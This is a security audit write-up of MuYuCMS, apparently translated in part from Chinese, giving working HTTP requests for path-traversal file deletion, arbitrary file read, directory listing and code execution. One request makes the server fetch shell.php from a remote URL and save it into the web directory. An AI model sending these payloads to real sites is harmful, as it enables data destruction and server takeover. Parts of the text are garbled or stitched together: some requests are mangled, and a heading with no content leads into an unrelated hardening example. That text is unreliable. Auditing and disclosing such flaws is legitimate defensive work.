原標(biāo)題:木魚(yú)cms 審計(jì)小結(jié)MuYuCMS基于Thinkphp開(kāi)發(fā)的一套輕量級(jí)開(kāi)源內(nèi)容管理系統(tǒng),專(zhuān)注為公司企業(yè)、個(gè)人站長(zhǎng)提供快速建站提供解決方案。
?環(huán)境搭建 我們利用 phpstudy 來(lái)搭建環(huán)境,選擇 Apache2.4.39 + MySQL5.7.26+ php5.6.9 ,同時(shí)利用 PhpStorm 來(lái)實(shí)現(xiàn)對(duì)項(xiàng)目的調(diào)試
Vulnerability reproduction and analysis

Arbitrary file deletion

We create a file test.txt in the site's web root to check whether the file gets deleted.

Arbitrary file deletion (1)

Reproduction: after logging into the admin backend, construct the following request:

POST /admin.php/accessory/filesdel.html HTTP/1.1
Host: test.test
Content-Length: 55
Accept: */*
X-Requested-With:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://test.test
Referer: http://test.test/admin.php/accessory/filelist.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: muyu_checkaccre=1676530347; PHPSESSID=ae5mpn24ivb25od6st8sdoouf7; muyu_first=1676531718; XDEBUG_SESSION=PHPSTORM
Connection: close

filedelur=/upload/files/.gitignore/../../../../test.txt

The file is deleted successfully.

Analysis: \app\admin\controller\Accessory::filesdel
The path of the file to delete is built by concatenating the parameter $filedelurl, and the file is then removed with unlink(); no validation happens in between.

Arbitrary file deletion (2)

Reproduction: after logging into the admin backend, construct the following request:

POST /admin.php/accessory/picdel.html HTTP/1.1
Host: test.test
Content-Length: 54
Accept: */*
X-Requested-With:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://test.test
Referer: http://test.test/admin.php/accessory/filelist.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: muyu_checkaccre=1676530347; PHPSESSID=ae5mpn24ivb25od6st8sdoouf7; muyu_first=1676531718; XDEBUG_SESSION=PHPSTORM
Connection: close

picdelur=/upload/files/.gitignore/../../../../test.txt

Analysis: \app\admin\controller\Accessory::picdel
The path of the image to delete is built by concatenating the parameter $picdelur, and the file is then removed with unlink(); no validation happens in between.

Arbitrary file deletion (3)

Reproduction: after logging into the admin backend, construct the following request:

GET /editor/index.php?a=delete_node&type=file&path=F:/Tools/phpstudy_pro/WWW/MuYuCMS-master/MuYuCMS-master/template/../test.txt HTTP/1.1
Host: test.test
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://test.test
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://test.test/editor/index.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: muyu_checkaccre=1676601856; PHPSESSID=94241isj4cqrr0nefhv9rvs1b2; XDEBUG_SESSION=PHPSTORM
Connection: close

Analysis: App\Controller\Controller::delete_node, App\Core\File::deleteFile, App\Controller\Controller::beforeFun
對(duì)傳入的 path 判斷了是否在合法的文件域中,但沒(méi)有對(duì)傳入的 path 沒(méi)有進(jìn)行跨目錄的校驗(yàn)就刪除了文件?任意文件刪除四 漏洞復(fù)現(xiàn) POST /admin.php/database/sqldel.html HTTP/
1.1Host: test.test Cache-Control: max-age= 0Upgrade-Insecure-Requests: 1Origin: http: //test.testUser-Agent: Mozilla/
5.0(Windows NT 10.0; Win64; x64) AppleWebKit/ 537.36(KHTML, like Gecko) Chrome/ 85.0.4183.83Safari/ 537.36
Accept: text/html,application/xhtml+xml,application/xml;q= 0.9,image/avif,image/webp,image/apng,* /*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://test.test/editor/index.php Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9
Cookie: muyu_checkaccre=1676601856; PHPSESSID=94241isj4cqrr0nefhv9rvs1b2;XDEBUG_SESSION=PHPSTORM Connection: close
Content-Type: application/x-www-form-urlencoded Content-Length: 19 name=../../test.txt
漏洞分析 ppdmincontrollerDatabase::sqldel
The parameter name is taken from the POST body and passed to delFile, which deletes the file.

Arbitrary file deletion (5)

Reproduction: after logging into the admin backend, construct the following request:

POST /admin.php/update/rmdirr.html?dirname=F:/Tools/phpstudy_pro/WWW/MuYuCMS-master/MuYuCMS-master/template/../test.txt HTTP/1.1
Host: test.test
Content-Length: 0
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
X-Requested-With:
Origin: http://test.test
Referer: http://test.test/admin.php/system/update.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=d3bt6cnt59c2dfq7pshva5ffc1; muyu_checkaccre=1676878715; muyu_first=1676879341
Connection: close

Analysis: \app\admin\controller\Update::rmdirr
The parameter $dirname goes through only a simple check before unlink() is called to delete the file.

Arbitrary file read

Reproduction: after logging in, construct the following request:

GET /editor/index.php?a=get_file&file_path=F:/Tools/phpstudy_pro/WWW/MuYuCMS-master/MuYuCMS-master/template/../test.txt HTTP/1.1
Host: test.test
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://test.test
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://test.test/editor/index.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: muyu_checkaccre=1676601856; PHPSESSID=94241isj4cqrr0nefhv9rvs1b2; XDEBUG_SESSION=PHPSTORM
Connection: close
The file contents are read successfully.

Analysis: App\Controller\Controller::get_file

Directory listing

Reproduction: after logging in, construct the following request:

GET /editor/index.php?a=dir_list&dir_path=F:/Tools/phpstudy_pro/WWW/MuYuCMS-master/MuYuCMS-master/template/../../../../../../../../ HTTP/1.1
Host: test.test
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://test.test
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://test.test/editor/index.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: muyu_checkaccre=1676601856; PHPSESSID=94241isj4cqrr0nefhv9rvs1b2; XDEBUG_SESSION=PHPSTORM
Connection: close

The contents of the root directory are exposed.

Analysis: App\Controller\Controller::dir_list, App\Core\Jstree::getDir, App\Controller\Controller::beforeFun

The incoming dir_path is checked to be within the permitted file area, but no directory-traversal check is performed on it before the directory information is printed.
Arbitrary code execution

Arbitrary code execution (1)

Reproduction: after logging in, construct a request that reads the contents of the config file:

GET /editor/index.php?a=get_file&file_path=F:/Tools/phpstudy_pro/WWW/MuYuCMS-master/MuYuCMS-master/template/member_temp/user/config.php HTTP/1.1
Host: test.test
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://test.test
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://test.test/editor/index.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: muyu_checkaccre=1676601856; PHPSESSID=94241isj4cqrr0nefhv9rvs1b2; XDEBUG_SESSION=PHPSTORM
Connection: close
此時(shí)需要獲取的并不是文件內(nèi)容,而是更改之后文件的key復(fù)制文件校驗(yàn)碼 替換到下面數(shù)據(jù)包中GET /editor/index.php?a=save_file&file_path=F:/Tools/phpstudy_pro/WWW/MuYuCMS-master/MuYuCMS-master/template/member_temp/user/config.php&file_key=5e9c862ce52986e5437652d707c7c82f&file_content= HTTP/
1.1Host: test.test Cache-Control: max-age= 0Upgrade-Insecure-Requests: 1Origin: http: //test.testUser-Agent: Mozilla/
5.0(Windows NT 10.0; Win64; x64) AppleWebKit/ 537.36(KHTML, like Gecko) Chrome/ 85.0.4183.83Safari/ 537.36
Accept: text/html,application/xhtml+xml,application/xml;q= 0.9,image/avif,image/webp,image/apng,* /*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://test.test/editor/index.php Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9
Cookie: muyu_checkaccre=1676601856; PHPSESSID=94241isj4cqrr0nefhv9rvs1b2;XDEBUG_SESSION=PHPSTORM Connection: close
Visiting the file's corresponding location on the site shows that the code has been executed; other code can be executed the same way.

Analysis: App\Controller\Controller::save_file

save_file performs a save-file operation, but it requires the file's checksum. So one can first query the file's information and then modify the file. App\Core\File::setFileContent

Arbitrary code execution (2)

Reproduction: after logging in, construct the following request:

POST /admin.php/update/getFile.html?url=http://127.0.0.1:8000/shell.php&save_dir=F:/Tools/phpstudy_pro/WWW/MuYuCMS-master/MuYuCMS-master/template/ HTTP/1.1
Host: test.test
Content-Length: 0
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
X-Requested-With:
Origin: http://test.test
Referer: http://test.test/admin.php/system/update.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=d3bt6cnt59c2dfq7pshva5ffc1; muyu_checkaccre=1676878715; muyu_first=1676879341; XDEBUG_SESSION=PHPSTORM
Connection: close

The file is downloaded from the specified remote URL and saved to the specified location. Visiting the specified directory shows that the code was executed.

Analysis: \app\admin\controller\Update::getFile

$url specifies the address of the remote file to fetch and $save_dir the path to save it to; neither the file's content nor its type is validated, which is what produces the code execution.

Phar deserialization

Reproduction
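For the getFile import analysed above, the PHP below is an added example, not MuYuCMS code, of a hardened remote fetch: the save directory and file name are chosen by the server, only allowlisted extensions whose bytes sniff as the matching MIME type are written, and non-web URL schemes are rejected. IMPORT_DIR, MAX_BYTES and the allowlist are assumptions; fileinfo and PHP 7.1 or later are assumed available.

```php
<?php
// Added example (not MuYuCMS code): import a remote file without letting the
// caller choose the save directory, the file name or an executable type.

const IMPORT_DIR = __DIR__ . '/upload/import';    // fixed; never from the request
const MAX_BYTES  = 10 * 1024 * 1024;
// Extension allowlist paired with the MIME type the bytes must actually have.
const ALLOWED_TYPES = [
    'png'  => 'image/png',
    'jpg'  => 'image/jpeg',
    'jpeg' => 'image/jpeg',
    'gif'  => 'image/gif',
    'zip'  => 'application/zip',
];

function importRemoteFile(string $url): ?string
{
    $parts = parse_url($url);
    // Only plain web schemes: rules out file://, phar:// and similar wrappers.
    if (!is_array($parts) || !in_array($parts['scheme'] ?? '', ['http', 'https'], true)) {
        return null;
    }
    $ext = strtolower(pathinfo($parts['path'] ?? '', PATHINFO_EXTENSION));
    if (!isset(ALLOWED_TYPES[$ext])) {
        return null;                                   // .php, .phtml, ... never reach disk
    }
    $ctx  = stream_context_create(['http' => ['timeout' => 10, 'follow_location' => 0]]);
    $data = @file_get_contents($url, false, $ctx, 0, MAX_BYTES + 1);
    if ($data === false || strlen($data) > MAX_BYTES) {
        return null;                                   // unreachable or oversized
    }
    // The extension is attacker-chosen; check what the bytes really are.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->buffer($data);
    if ($mime !== ALLOWED_TYPES[$ext]) {
        return null;
    }
    if (!is_dir(IMPORT_DIR) && !mkdir(IMPORT_DIR, 0750, true)) {
        return null;
    }
    // Server-generated name: nothing from the URL reaches the path.
    $dest = IMPORT_DIR . '/' . bin2hex(random_bytes(16)) . '.' . $ext;
    return file_put_contents($dest, $data) === false ? null : $dest;
}

// The request from the write-up fails the extension allowlist before any fetch.
var_dump(importRemoteFile('http://127.0.0.1:8000/shell.php'));
```

IMPORT_DIR should additionally be served with script execution disabled in the web server configuration, so that even a mis-sniffed file cannot run.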